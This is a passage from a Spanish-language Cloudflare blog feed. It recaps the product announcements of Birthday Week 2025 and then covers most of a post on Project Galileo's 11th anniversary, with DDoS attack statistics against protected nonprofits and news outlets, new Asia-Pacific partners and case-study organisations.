            <content:encoded><![CDATA[ <p>Cloudflare se lanzó hace quince años con la misión de ayudar a mejorar Internet. Durante ese tiempo, Internet ha cambiado, al igual que lo que necesita de equipos como el nuestro.  En la <a href="https://blog.cloudflare.com/cloudflare-2025-annual-founders-letter/"><u>carta de los fundadores</u></a> de este año, Matthew y Michelle comentan cómo hemos contribuido a la evolución de Internet, desde ayudar al crecimiento de la encriptación del tráfico de Internet del 10 % al 95 % hasta desafíos más recientes, como la forma en que los usuarios consumen contenido. </p><p>Cada año, durante la Semana aniversario, lanzamos los productos y funciones que creemos que Internet necesita en ese momento y en el futuro cercano. Durante la <a href="https://blog.cloudflare.com/tag/birthday-week/"><u>Semana aniversario</u></a> de años anteriores, lanzamos una gran variedad de soluciones, como la <a href="https://blog.cloudflare.com/introducing-cloudflares-automatic-ipv6-gatewa/"><u>puerta de enlace IPv6</u></a> en 2011, <a href="https://blog.cloudflare.com/introducing-universal-ssl/"><u>Universal SSL</u></a> en 2014, <a href="https://blog.cloudflare.com/introducing-cloudflare-workers/"><u>Cloudflare Workers</u></a> y la <a href="https://blog.cloudflare.com/unmetered-mitigation/"><u>protección contra DDoS ilimitada</u></a> en 2017, <a href="https://blog.cloudflare.com/introducing-cloudflare-radar/"><u>Cloudflare Radar</u></a> en 2020, el <a href="https://blog.cloudflare.com/introducing-r2-object-storage/"><u>almacenamiento de objetos R2</u></a> sin tarifas de salida en 2021, las <a href="https://blog.cloudflare.com/post-quantum-tunnel/"><u>actualizaciones poscuánticas para Cloudflare Tunnel</u></a> en 2022 y <a href="https://blog.cloudflare.com/best-place-region-earth-inference/"><u>Workers AI</u></a> y <a href="https://blog.cloudflare.com/announcing-encrypted-client-hello/"><u>Encrypted Client Hello</u></a> en 2023. Estos son tan solo algunos ejemplos.</p><p>Los temas de este año se han centrado en cómo podemos ayudar a preparar Internet para un nuevo modelo de monetización que fomente la publicación de contenido de calidad, un modelo que promueva más oportunidades para el desarrollo de una comunidad dentro y fuera de Cloudflare, así como misiones permanentes como poner más funciones a disposición de todos los usuarios y mejorar continuamente la velocidad y la seguridad de nuestras soluciones.</p><p>Este año hemos lanzado muchas novedades. Por si te has perdido las docenas de publicaciones del blog, aquí tienes un resumen de todas las novedades anunciadas durante la Semana aniversario 2025. </p><p><b>Lunes, 22 de septiembre</b></p><table><tr><td><p><b>Qué</b></p></td><td><p><b>En pocas palabras …</b></p></td></tr><tr><td><p><a href="https://blog.cloudflare.com/cloudflare-1111-intern-program/"><u><b>Ayudemos a construir el futuro | Cloudflare anuncia la contratación de 1111 becarios en 2026</b></u></a></p></td><td><p>Para invertir en la nueva generación de desarrolladores, anunciamos nuestro programa de becarios más ambicioso hasta la fecha, con el objetivo de contratar a 1111 becarios en 2026.</p></td></tr><tr><td><p><a href="https://blog.cloudflare.com/supporting-the-future-of-the-open-web/"><u><b>Apoyamos el futuro de la web abierta | Cloudflare patrocina a Ladybird y Omarchy</b></u></a></p></td><td><p>Para fomentar un Internet diverso y abierto, ahora patrocinamos Ladybird (un navegador independiente) y Omarchy (un entorno de desarrollo y distribución de Linux de código abierto).</p></td></tr><tr><td><p><a href="https://blog.cloudflare.com/new-hubs-for-startups/"><u><b>Únete a nosotros: los nuevos centros de Cloudflare para startups</b></u></a></p></td><td><p>Abrimos las puertas de nuestras oficinas en cuatro ciudades principales (San Francisco, Austin, Londres y Lisboa) como centros gratuitos para que las startups puedan colaborar y conectarse con la comunidad de desarrolladores.</p></td></tr><tr><td><p><a href="https://blog.cloudflare.com/ai-crawl-control-for-project-galileo/"><u><b>Acceso gratuito a los servicios para desarrolladores de Cloudflare para organizaciones sin ánimo de lucro y de la sociedad civil</b></u></a></p></td><td><p>Ampliamos nuestro programa Cloudflare para Startups a las organizaciones sin ánimo de lucro y de interés público, ofreciéndoles créditos gratuitos para nuestras herramientas para desarrolladores.</p></td></tr><tr><td><p><a href="https://blog.cloudflare.com/workers-for-students/"><u><b>Novedad: Acceso gratuito para estudiantes a las funciones para desarrolladores de Cloudflare</b></u></a></p></td><td><p>Eliminamos el obstáculo que supone el coste para la nueva generación al proporcionar a los estudiantes una dirección de correo electrónico .edu con 12 meses de acceso gratuito a las funciones de pago de nuestra plataforma para desarrolladores.</p></td></tr><tr><td><p><a href="https://blog.cloudflare.com/capnweb-javascript-rpc-library/"><u><b>Cap'n Web, un nuevo sistema RPC para navegadores y servidores web</b></u></a></p></td><td><p>Hemos liberado el código de Cap'n Web, un nuevo protocolo RPC nativo de JavaScript que simplifica la comunicación eficaz y sin esquemas para las aplicaciones web.</p></td></tr><tr><td><p><a href="https://blog.cloudflare.com/workers-launchpad-006/"><u><b>Repaso a Workers Launchpad y una cálida bienvenida al grupo n.º 6</b></u></a></p></td><td><p>Anunciamos el grupo n.º 6 de Workers Launchpad, nuestro programa acelerador para startups que desarrollan en Cloudflare.</p></td></tr></table><p><b>Martes, 23 de septiembre</b></p><table><tr><td><p><b>Qué</b></p></td><td><p><b>En pocas palabras …</b></p></td></tr><tr><td><p><a href="https://blog.cloudflare.com/per-customer-bot-defenses/"><u><b>Creación de defensas únicas y personalizadas para cada cliente contra las amenazas avanzadas de los bots en la era de la IA</b></u></a></p></td><td><p>Nuevo sistema de detección de anomalías que emplea el aprendizaje automático entrenado en cada zona para desarrollar la protección contra los ataques de bots con IA. </p></td></tr><tr><td><p><a href="https://blog.cloudflare.com/cloudflare-astro-tanstack/"><u><b>Por qué Cloudflare, Netlify y Webflow colaboran para dar soporte a herramientas de código abierto</b></u></a></p></td><td><p>Para apoyar la web abierta, aunamos fuerzas con Webflow para patrocinar Astro y con Netlify para patrocinar TanStack.</p></td></tr><tr><td><p><a href="https://blog.cloudflare.com/x402/"><u><b>Lanzamiento de x402 Foundation con Coinbase y soporte para transacciones x402</b></u></a></p></td><td><p>Nos asociamos con Coinbase para crear x402 Foundation, fomentando la adopción del <a href="https://github.com/coinbase/x402?cf_target_id=4D4A124640BFF471F5B56706F9A86B34"><u>protocolo x402</u></a> para que los clientes y los servicios puedan intercambiar valor en la web gracias a un lenguaje común.</p></td></tr><tr><td><p><a href="https://blog.cloudflare.com/ai-crawl-control-for-project-galileo/"><u><b>Ayudamos a proteger a los periodistas y las noticias locales de los rastreadores de IA con el proyecto Galileo</b></u></a></p></td><td><p>Ampliamos nuestros servicios gratuitos de gestión de bots y AI Crawl Control a los periodistas y las organizaciones de noticias a través del proyecto Galileo.</p></td></tr><tr><td><p><a href="https://blog.cloudflare.com/confidence-score-rubric/"><u><b>Cloudflare Confidence Scorecards, mayor seguridad de la IA para Internet</b></u></a></p></td><td><p>Evaluación automatizada de las herramientas de IA y SaaS a fin de que las organizaciones puedan adoptar la IA sin poner en riesgo la seguridad.</p></td></tr></table><p><b>Miércoles, 24 de septiembre</b></p><table><tr><td><p><b>Qué</b></p></td><td><p><b>En pocas palabras …</b></p></td></tr><tr><td><p><a href="https://blog.cloudflare.com/automatically-secure/"><u><b>Seguridad automática: cómo actualizamos 6 000 000 de dominios por defecto</b></u></a></p></td><td><p>Nuestro sistema automático de SSL/TLS ha actualizado más de 6 millones de dominios a modos de encriptación más seguros por defecto y en breve activará automáticamente las conexiones poscuánticas.</p></td></tr><tr><td><p><a href="https://blog.cloudflare.com/content-signals-policy/"><u><b>La nueva política de señales de contenido de Cloudflare ofrece opciones a los usuarios</b></u></a></p></td><td><p>La política de señales de contenido es un nuevo estándar para robots.txt que permite a los creadores expresar claramente sus preferencias acerca de cómo la IA puede utilizar su contenido.</p></td></tr><tr><td><p><a href="https://blog.cloudflare.com/building-a-better-internet-with-responsible-ai-bot-principles/"><u><b>Para mejorar Internet en la era de la IA, necesitamos principios responsables para los bots de IA</b></u></a></p></td><td><p>Un conjunto propuesto de principios responsables para los bots de IA para iniciar una conversación en torno a la transparencia y el respeto por las preferencias de los creadores de contenido.</p></td></tr><tr><td><p><a href="https://blog.cloudflare.com/saas-to-saas-security/"><u><b>Protección de datos en la integración de aplicaciones SaaS</b></u></a></p></td><td><p>Nuevas herramientas de seguridad para proporcionar a las empresas visibilidad y control sobre los datos que fluyen entre las aplicaciones SaaS.</p></td></tr><tr><td><p><a href="https://blog.cloudflare.com/post-quantum-warp/"><u><b>Protegemos el presente para el futuro cuántico | El cliente WARP ahora es compatible con la criptografía poscuántica</b></u></a></p></td><td><p>El cliente WARP de Cloudflare ahora admite la criptografía poscuántica, y proporciona encriptación resistente a las amenazas cuánticas para el tráfico. </p></td></tr><tr><td><p><a href="https://blog.cloudflare.com/a-simpler-path-to-a-safer-internet-an-update-to-our-csam-scanning-tool/"><u><b>Un camino más sencillo hacia la seguridad en Internet | Actualización de nuestra herramienta de análisis CSAM</b></u></a></p></td><td><p>Hemos facilitado la adopción de nuestra herramienta de análisis CSAM al eliminar la necesidad de crear y proporcionar credenciales exclusivas, lo que ayuda a más propietarios de sitios a proteger sus plataformas.</p></td></tr></table><p>
<b>Jueves, 25 de septiembre</b></p><table><tr><td><p><b>Qué</b></p></td><td><p><b>En pocas palabras …</b></p></td></tr><tr><td><p><a href="https://blog.cloudflare.com/enterprise-grade-features-for-all/"><u><b>Todas las funciones de Cloudflare, disponibles para todos</b></u></a></p></td><td><p>Ahora todas las funciones de Cloudflare, empezando por el inicio de sesión único, están disponibles para su compra, para todos los usuarios, en cualquier plan. </p></td></tr><tr><td><p><a href="https://blog.cloudflare.com/cloudflare-developer-platform-keeps-getting-better-faster-and-more-powerful/"><u><b>La plataforma para desarrolladores de Cloudflare sigue mejorando, y cada vez es más rápida y eficaz</b></u></a></p></td><td><p>Actualizaciones en Workers y otras funciones para una plataforma de desarrollo más eficaz, como la compatibilidad con images de contenedores más grandes y concurrentes, la compatibilidad con modelos externos de OpenAI y Anthropic en AI Search (anteriormente AutoRAG) y mucho más. </p></td></tr><tr><td><p><a href="https://blog.cloudflare.com/planetscale-postgres-workers/"><u><b>Colaboración para acelerar el desarrollo integral | Implementación de bases de datos PlanetScale directamente desde Workers</b></u></a></p></td><td><p>Ahora puedes conectar Cloudflare Workers directamente a las bases de datos de PlanetScale, gracias a las conexiones optimizadas automáticamente por Hyperdrive.</p></td></tr><tr><td><p><a href="https://blog.cloudflare.com/cloudflare-data-platform/"><u><b>Novedad: Plataforma de datos de Cloudflare</b></u></a></p></td><td><p>Una solución integral para la ingesta, el almacenamiento y la consulta de tablas de datos analíticos mediante estándares abiertos como Apache Iceberg. </p></td></tr><tr><td><p><a href="https://blog.cloudflare.com/r2-sql-deep-dive/"><u><b>R2 SQL, un análisis detallado de nuestro nuevo motor de consultas distribuidas</b></u></a></p></td><td><p>Un análisis técnico detallado sobre R2 SQL, un motor de consulta sin servidor para conjuntos de datos de petabytes en R2.</p></td></tr><tr><td><p><a href="https://blog.cloudflare.com/safe-in-the-sandbox-security-hardening-for-cloudflare-workers/"><u><b>Seguro en el espacio aislado: mejoras de seguridad para Cloudflare Workers</b></u></a></p></td><td><p>Un análisis detallado de cómo hemos mejorado el entorno de ejecución de Workers con nuevas medidas de seguridad de protección integral, que incluyen espacios seguros V8 y claves de protección de memoria asistidas por hardware.</p></td></tr><tr><td><p><a href="https://blog.cloudflare.com/sovereign-ai-and-choice/"><u><b>Libertad de elección | El camino hacia la soberanía de la IA</b></u></a></p></td><td><p>Para promover la soberanía de la IA, hemos incorporado a nuestra plataforma Workers AI modelos de código abierto desarrollados localmente en India, Japón y el sudeste asiático.</p></td></tr><tr><td><p><a href="https://blog.cloudflare.com/email-service/"><u><b>Versión beta privada de Cloudflare Cloudflare Email Service</b></u></a></p></td><td><p>Anunciamos la versión beta privada de Cloudflare Email Service, que permite a los desarrolladores enviar y recibir correos electrónicos transaccionales con total confianza directamente desde Cloudflare Workers.</p></td></tr><tr><td><p><a href="https://blog.cloudflare.com/nodejs-workers-2025/"><u><b>Un año de mejoras en la compatibilidad de Node.js en Cloudflare Workers</b></u></a></p></td><td><p>Hay cientos de nuevas API de Node.js ahora disponibles que facilitan la ejecución del código Node.js existente en nuestra plataforma. </p></td></tr></table><p><b>Viernes, 26 de septiembre</b></p><table><tr><td><p><b>Qué</b></p></td><td><p><b>En pocas palabras …</b></p></td></tr><tr><td><p><a href="https://blog.cloudflare.com/20-percent-internet-upgrade"><u><b>Cloudflare ahora es más rápido y seguro gracias a Rust</b></u></a></p></td><td><p>Hemos rediseñado nuestro proxy principal con una nueva arquitectura modular basada en Rust, lo que reduce el tiempo de respuesta promedio en 10 ms para millones de clientes. </p></td></tr><tr><td><p><a href="https://blog.cloudflare.com//introducing-observatory-and-smart-shield/"><u><b>Novedades: Observatory y Smart Shield</b></u></a></p></td><td><p>Nuevas herramientas de supervisión en el panel de control de Cloudflare que ofrecen recomendaciones prácticas y soluciones con un solo clic para los problemas de rendimiento.</p></td></tr><tr><td><p><a href="https://blog.cloudflare.com/monitoring-as-sets-and-why-they-matter/"><u><b>Supervisión de los AS-SET y su importancia</b></u></a></p></td><td><p>Cloudflare Radar ahora incluye datos de IRR (Internet Routing Registry), lo que permite a los operadores de red supervisar los AS-SET para prevenir las fugas de ruta.</p></td></tr><tr><td><p><a href="https://blog.cloudflare.com/an-ai-index-for-all-our-customers"><u><b>Un índice de IA para todos nuestros clientes</b></u></a></p></td><td><p>Anunciamos la versión beta privada de AI Index, un nuevo servicio que crea un índice de búsqueda optimizado por IA para tu dominio, que puedes controlar y monetizar.</p></td></tr><tr><td><p><a href="https://blog.cloudflare.com/new-regional-internet-traffic-and-certificate-transparency-insights-on-radar/"><u><b>Presentamos nuevos datos sobre el tráfico regional de Internet y la transparencia de certificados en Cloudflare Radar</b></u></a></p></td><td><p>Información sobre el tráfico subnacional y paneles de control de transparencia de certificados para la supervisión de TLS.</p></td></tr><tr><td><p><a href="https://blog.cloudflare.com/eliminating-cold-starts-2-shard-and-conquer/"><u><b>Eliminación de los arranques en frío 2: divide y vencerás</b></u></a></p></td><td><p>Hemos reducido los arranques en frío de Workers en un 90 % mediante la implementación de un nuevo sistema de "fragmentación de Workers" que enruta las solicitudes a Workers ya cargados.</p></td></tr><tr><td><p><a href="https://blog.cloudflare.com/network-performance-update-birthday-week-2025/"><u><b>Actualización del rendimiento de red | Semana aniversario 2025</b></u></a></p></td><td><p>El gráfico del tiempo de conexión TCP (Trimean) muestra que tenemos el tiempo de conexión TCP más rápido en el 40 % de los proveedores de acceso a Internet medidos y el más rápido entre las principales redes.</p></td></tr><tr><td><p><a href="https://blog.cloudflare.com/how-cloudflare-uses-the-worlds-greatest-collection-of-performance-data/"><u><b>Cloudflare utiliza los datos de rendimiento para acelerar aún más la red global más rápida del mundo</b></u></a></p></td><td><p>Utilizamos la enorme cantidad de datos de rendimiento de nuestra red para optimizar los algoritmos de control de la congestión, con una mejora promedio de las velocidades del 10 % para el tráfico QUIC.
</p></td></tr></table>
    <div>
      <h3>¡Únete a nosotros!</h3>
      <a href="#unete-a-nosotros">
        
      </a>
    </div>
    <p>Nuestra misión de ayudar a mejorar Internet siempre ha ido más allá de la tecnología. La comunidad de personas que forman los equipos que ayudan a mejorar Internet es tan importante para su futuro como los anuncios sobre becarios o sobre la colaboración en nuestras oficinas. Esta semana, hemos lanzado nuestro conjunto de iniciativas más ambicioso hasta la fecha con el objetivo de apoyar a los desarrolladores, fundadores de empresas y estudiantes que están creando el futuro.</p><p>Para los fundadores de empresas y startups, estamos encantados de dar la bienvenida al <b>grupo n.º 6</b> a <b>Workers Launchpad</b>, nuestro programa acelerador que ofrece a las empresas en fase inicial los recursos que necesitan para crecer. Pero esto no es todo. Abrimos nuestras puertas, literalmente, lanzando <b>nuevos centros físicos para startups</b> en nuestras oficinas de San Francisco, Austin, Londres y Lisboa. Estos espacios ofrecerán acceso a asesoría, recursos y una comunidad de otros desarrolladores.</p><p>También estamos invirtiendo en la nueva generación de talento. Anunciamos el <b>acceso gratuito a la plataforma para desarrolladores de Cloudflare disponible para todos los estudiantes</b>, brindándoles las herramientas necesarias para aprender y experimentar sin límites. Asimismo, para facilitar la transición desde la etapa formativa al mundo laboral, hemos anunciado nuestro objetivo de contratar a <b>1111 becarios en 2026</b>, nuestro mayor compromiso hasta la fecha para respaldar a los futuros líderes tecnológicos.</p><p>La mejora de Internet es para todos. Ampliamos nuestro apoyo a las <b>organizaciones sin ánimo de lucro y de interés público</b>, ofreciéndoles acceso gratuito a nuestras herramientas para desarrolladores en entornos de producción, para que puedan concentrarse en su misión.</p><p>Tanto si eres un fundador de una empresa y tienes una idea fantástica, como si eres un estudiante que acaba de empezar, o bien formas parte de un equipo que trabaja por una causa en la que crees, queremos ayudarte a tener éxito.</p>
    <div>
      <h3>¡Hasta el año que viene!</h3>
      <a href="#hasta-el-ano-que-viene">
        
      </a>
    </div>
    <p>Queremos dar las gracias a nuestros clientes, a nuestra comunidad y a los millones de desarrolladores que confían en nosotros para ayudarles a desarrollar, proteger y acelerar Internet. Tu curiosidad y tus comentarios impulsan nuestra innovación.</p><p>Han sido 15 años increíbles. Y, como siempre: esto es solo el comienzo.</p> ]]></content:encoded>
            <category><![CDATA[Semana aniversario]]></category>
            <category><![CDATA[Socios]]></category>
            <category><![CDATA[Plataforma para desarrolladores]]></category>
            <category><![CDATA[Workers Launchpad]]></category>
            <category><![CDATA[Rendimiento]]></category>
            <category><![CDATA[Seguridad]]></category>
            <category><![CDATA[Cache]]></category>
            <category><![CDATA[Velocidad]]></category>
            <category><![CDATA[Desarrolladores]]></category>
            <category><![CDATA[AI]]></category>
            <category><![CDATA[1.1.1.1]]></category>
            <category><![CDATA[Seguridad de aplicaciones]]></category>
            <category><![CDATA[Servicios de aplicación]]></category>
            <category><![CDATA[Bots]]></category>
            <category><![CDATA[CDN (ES)]]></category>
            <category><![CDATA[Cloudflare for Startups]]></category>
            <category><![CDATA[Cloudflare One]]></category>
            <category><![CDATA[Cloudflare Zero Trust]]></category>
            <category><![CDATA[Cloudflare Workers]]></category>
            <guid isPermaLink="false">4k1NhJtljIsH7GOkpHg1Ei</guid>
            <dc:creator>Nikita Cano</dc:creator>
            <dc:creator>Korinne Alpers</dc:creator>
        </item>
        <item>
            <title><![CDATA[Celebramos los 11 años de impacto global del proyecto Galileo]]></title>
            <link>https://blog.cloudflare.com/es-es/celebrating-11-years-of-project-galileo-global-impact/</link>
            <pubDate>Thu, 12 Jun 2025 10:00:00 GMT</pubDate>
            <description><![CDATA[ En junio de 2025 se cumple el 11.º aniversario del proyecto Galileo, la iniciativa de Cloudflare para proteger a las organizaciones de interés público vulnerables frente a las ciberamenazas. ]]></description>
            <content:encoded><![CDATA[ <p>Este mes se cumple el 11.º aniversario del <a href="https://www.cloudflare.com/galileo/"><u>proyecto Galileo</u></a>, la iniciativa de Cloudflare para proporcionar protección gratuita en materia de ciberseguridad a organizaciones vulnerables que trabajan por el interés público de todo el mundo. Desde medios de comunicación independientes y grupos de derechos humanos hasta activistas comunitarios, el proyecto Galileo apoya a quienes a menudo son blanco de ataques por su labor esencial en materia de derechos humanos, sociedad civil y construcción de la democracia.</p><p>Muchas cosas han cambiado desde que celebramos el <a href="https://blog.cloudflare.com/pt-br/celebrating-10-years-of-project-galileo/"><u>10.º aniversario</u></a> del proyecto Galileo. Sin embargo, nuestro compromiso sigue siendo el mismo: ayudar a garantizar que las organizaciones que realizan una labor fundamental en materia de derechos humanos tengan acceso a las herramientas que necesitan para mantenerse en línea.  Creemos que las organizaciones, independientemente del lugar del mundo en el que se encuentren, merecen una protección fiable y accesible para continuar con su importante trabajo sin interrupciones.</p><p>Con motivo de nuestro 11.º aniversario, nos complace compartir algunas novedades, entre ellas:</p><ul><li><p>Un informe interactivo <a href="https://radar.cloudflare.com/reports/project-galileo-11th-anniv"><u>Cloudflare Radar</u></a> que ofrece información sobre las ciberamenazas a las que se enfrentan las organizaciones de interés público en riesgo protegidas por el proyecto. </p></li><li><p>Un mayor compromiso con los derechos digitales en la región de Asia-Pacífico con la incorporación de dos nuevos socios al proyecto Galileo.</p></li><li><p><a href="https://www.cloudflare.com/project-galileo-case-studies/"><u>Nuevas historias </u></a>de organizaciones protegidas por el proyecto Galileo que trabajan en la primera línea de la sociedad civil, los derechos humanos y el periodismo de todo el mundo.</p></li></ul>
          <figure>
          <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/3xVNGtdTOw6NXqSfzU7Up1/8a2cbe643108fa97a4d14af477a6cb80/image3.png" />
          </figure>
    <div>
      <h2>Seguimiento y notificación de ciberataques con el informe Radar con motivo del 11.º aniversario del proyecto Galileo </h2>
      <a href="#seguimiento-y-notificacion-de-ciberataques-con-el-informe-radar-con-motivo-del-11-o-aniversario-del-proyecto-galileo">
        
      </a>
    </div>
    <p>Para conmemorar el 11.º aniversario del proyecto Galileo, hemos publicado un <a href="https://radar.cloudflare.com/reports/project-galileo-11th-anniv"><u>nuevo informe Radar</u></a> que incluye datos sobre los ciberataques contra organizaciones protegidas por el programa. Ofrece información sobre los tipos de amenazas a las que se enfrentan estos grupos, con el objetivo de apoyar mejor a los investigadores, la sociedad civil y los grupos vulnerables mediante la promoción de las mejores prácticas de ciberseguridad. Entre las ideas clave se incluyen:</p><ul><li><p>Nuestros datos indican una tendencia al alza de los ataques DDoS contra estas organizaciones, que se están volviendo más comunes que los intentos de explotar vulnerabilidades tradicionales de las aplicaciones web.</p></li><li><p>Entre el 1 de mayo de 2024 y el 31 de marzo de 2025, Cloudflare bloqueó 108 900 millones de ciberamenazas contra organizaciones protegidas por el proyecto Galileo. Esto supone una media de casi 325,2 millones de ciberataques al día durante un periodo de 11 meses, lo que supone un aumento del 241% con respecto a nuestro informe Radar de 2024. </p></li><li><p>Los periodistas y las organizaciones de noticias sufrieron el mayor volumen de ataques, de hecho se bloquearon más de 97 000 millones de solicitudes como amenazas potenciales en 315 organizaciones diferentes. El pico de ataque de tráfico se registró el 28 de septiembre de 2024. En segundo lugar se situó la categoría de derechos humanos / organizaciones de la sociedad civil, en la que se bloquearon 8900 millones de solicitudes, y el pico de actividad de los ataques se produjo el 8 de octubre de 2024.</p></li><li><p>Cloudflare incorporó el <a href="https://investigatebel.org/en"><u>Centro de investigación de Bielorrusia</u></a>, una organización de periodismo independiente, el 27 de septiembre de 2024, cuando ya estaba siendo objeto de ataque. El 28 de septiembre se produjo un importante ataque DDoS a la capa de aplicación, que generó más de 28 000 millones de solicitudes en un solo día. </p></li><li><p>Muchos de los objetivos eran medios de comunicación de investigación que operaban en regiones sometidas a presión gubernamental (como Rusia y Bielorrusia), así como ONG dedicadas a la lucha contra el racismo y el extremismo, y a la defensa de los derechos de los trabajadores.</p></li><li><p><a href="https://t4p.co/"><u>Tech4Peace</u></a>, una organización de derechos humanos centrada en los derechos digitales, fue objeto de un ataque de 12 días que comenzó el 10 de marzo de 2025 y que generó más de 2700 millones de solicitudes. El ataque consistió en ataques prolongados de menor intensidad y ráfagas cortas de alta intensidad. Esta variación intencionada en las tácticas revela un enfoque coordinado, que muestra cómo los atacantes adaptaron sus métodos a lo largo del ataque.</p></li></ul><p>El informe completo Radar incluye información adicional sobre organizaciones de interés público, grupos de derechos humanos y civiles, organizaciones medioambientales y organizaciones implicadas en desastres y ayuda humanitaria. El panel de control también es un recurso valioso para los responsables políticos, los investigadores y los defensores que trabajan para proteger a las organizaciones de interés público en todo el mundo.</p>
    <div>
      <h2>Los socios globales son la clave del crecimiento continuo del proyecto Galileo</h2>
      <a href="#los-socios-globales-son-la-clave-del-crecimiento-continuo-del-proyecto-galileo">
        
      </a>
    </div>
    <p>Las asociaciones son fundamentales para el éxito del proyecto Galileo. Contamos con <a href="https://www.cloudflare.com/galileo/"><u>56 organizaciones de la sociedad civil de confianza</u></a> de todo el mundo para que nos ayuden a identificar y a apoyar a los grupos que podrían beneficiarse de nuestra protección. Con la ayuda de nuestros socios, estamos ampliando nuestro alcance para proporcionar herramientas a las comunidades que más necesitan protección. Hoy, nos complace dar la bienvenida a dos nuevos socios al proyecto Galileo que defienden los derechos digitales, las tecnologías abiertas y la sociedad civil en Asia y en todo el mundo. </p>
          <figure>
          <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/6Jg4RyM682Ykduf5EKGmXe/c0a8a797a1f889d0a1e02b68115238f9/Screenshot_2025-06-11_at_14.13.51.png" />
          </figure><p><a href="https://engagemedia.org/"><u>EngageMedia</u></a> es una organización sin ánimo de lucro que aúna la defensa de causas, los medios de comunicación y la tecnología para promover los derechos digitales, la tecnología abierta y segura y los documentales sobre temas sociales. Con sede en la región de Asia-Pacífico, EngageMedia colabora con agentes del cambio y comunidades de base para proteger los derechos humanos, la democracia y el medio ambiente.</p><p>Como parte de nuestra colaboración, Cloudflare ha participado este año en un taller tecnológico (2025 Tech Camp) para defensores de los derechos humanos organizado por EngageMedia, que reunió a unos 40 activistas y tecnólogos de toda la región Asia-Pacífico. Entre otras cosas, el taller se centró en desarrollar habilidades prácticas en seguridad digital y resistencia de los sitios web contra las amenazas en línea. Cloudflare habló sobre los vectores de ataque más comunes contra organizaciones sin ánimo de lucro y grupos de derechos humanos, tales como los ataques DDoS, el phishing y la desfiguración de sitios web, y compartió cómo el proyecto Galileo ayuda a las organizaciones a mitigar estos riesgos. También analizamos cómo promover mejor las herramientas de seguridad digital entre los grupos vulnerables. El taller fue una oportunidad valiosa para escuchar y aprender de organizaciones que trabajan en primera línea, que nos ofrecieron ideas que siguen dando forma a nuestro enfoque para crear soluciones de seguridad eficaces e impulsadas por la comunidad.</p>
          <figure>
          <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/4tX9mgOO8Ss3Wp41E6xj8Q/33e88d0736cf403882b2cef590b2f9bb/Screenshot_2025-06-11_at_14.14.04.png" />
          </figure><p>Fundada en 2014 por líderes de las comunidades tecnológicas abiertas de Taiwán, la <a href="https://ocf.tw/en/"><u>Open Culture Foundation </u></a>(OCF) apoya los esfuerzos para proteger los derechos digitales, promover la tecnología cívica y fomentar la colaboración abierta entre el Gobierno, la sociedad civil y la comunidad tecnológica. A través de nuestra asociación, nuestro objetivo es apoyar a más de 34 organizaciones locales de la sociedad civil en Taiwán proporcionándoles formación y talleres para ayudarlas a gestionar la infraestructura de sus sitios web, abordar vulnerabilidades como los ataques DDoS y realizar investigaciones continuas para hacer frente a los desafíos de seguridad a los que se enfrentan estas comunidades.</p>
    <div>
      <h2>Historias reales  </h2>
      <a href="#historias-reales">
        
      </a>
    </div>
    <p>Seguimos inspirándonos en el increíble trabajo y la dedicación de las organizaciones que participan en el proyecto Galileo. Ayudar a proteger a estas organizaciones y permitirles centrarse en su trabajo es una parte fundamental para ayudar a mejorar Internet. Estas son algunas de sus historias:</p><ul><li><p><a href="https://fairfuturefoundation.org/"><u>Fair Future Foundation</u></a> (Indonesia): organización sin ánimo de lucro que presta servicios sanitarios y educativos y facilita el acceso a recursos básicos como agua potable y electricidad en zonas ultra rurales del sudeste asiático. </p></li><li><p><a href="https://yihr.org/"><u>Youth Initiative for Human Rights</u></a> (Serbia): red regional de ONG que promueve los derechos humanos, el activismo juvenil y la reconciliación en los Balcanes.</p></li><li><p><a href="https://investigatebel.org/en"><u>Centro de investigación de Bielorrusia</u></a> (Bielorrusia): organización de medios de comunicación que lleva a cabo investigaciones exhaustivas sobre la corrupción, la evasión de sanciones y la desinformación en Bielorrusia y las regiones vecinas. </p></li><li><p><a href="https://gcef.ca/en/"><u>The Greenpeace Canada Education Fund (GCEF)</u></a> (Canadá): organización sin ánimo de lucro que lleva a cabo estudios, investigaciones y educación pública sobre el cambio climático, la biodiversidad y la justicia medioambiental. </p></li><li><p><a href="https://insightcrime.org/"><u>Insight Crime</u></a> (Latinoamérica): grupo de expertos sin ánimo de lucro y organización de medios de comunicación que investiga y analiza la delincuencia organizada y la seguridad ciudadana en Latinoamérica y el Caribe. </p></li><li><p><a href="http://diez.md"><u>Diez.md</u></a> (Moldavia): plataforma de noticias moldava enfocada en los jóvenes que ofrece contenido en rumano y ruso sobre temas como educación, cultura, temas sociales, supervisión de elecciones y noticias. </p></li><li><p><a href="https://engagemedia.org/"><u>Engage Media</u></a> (APAC): organización sin ánimo de lucro dedicada a defender los derechos digitales y a apoyar a los defensores de los derechos humanos, la democracia y la sostenibilidad medioambiental en Asia-Pacífico. </p></li><li><p><a href="https://pussyriot.love/"><u>Pussy Riot</u></a> (Europa): colectivo artístico y activista feminista global que utiliza el arte, el espectáculo y la acción directa para desafiar el autoritarismo y las violaciones de los derechos humanos. </p></li><li><p><a href="https://www.ilrc.org/"><u>Immigrant Legal Resource Centre</u></a> (Estados Unidos): trabaja para promover los derechos de los inmigrantes, ofrece formación jurídica, desarrolla materiales educativos, aboga por políticas justas y presta apoyo a organizaciones comunitarias.</p></li><li><p><a href="https://5wf.org/"><u>5wf Foundation</u></a> (Países Bajos): organización sin ánimo de lucro dedicada a la conservación de la vida silvestre que apoya a equipos de conservación de primera línea en todo el mundo proporcionando equipos para proteger las especies y los ecosistemas amenazados.</p></li></ul><p>Estos casos prácticos ofrecen una perspectiva de la naturaleza diversa y global de las amenazas a las que se enfrentan estos grupos, así como del papel fundamental que desempeña la ciberseguridad para garantizar vuestra seguridad en Internet. Echa un vistazo a sus historias y mucho más: <a href="http://cloudflare.com/project-galileo-case-studies/"><u>https://www.cloudflare.com/es-es/project-galileo-case-studies/</u></a></p>
    <div>
      <h2>Continuamos ofreciendo apoyo a grupos vulnerables de todo el mundo </h2>
      <a href="#continuamos-ofreciendo-apoyo-a-grupos-vulnerables-de-todo-el-mundo">
        
      </a>
    </div>
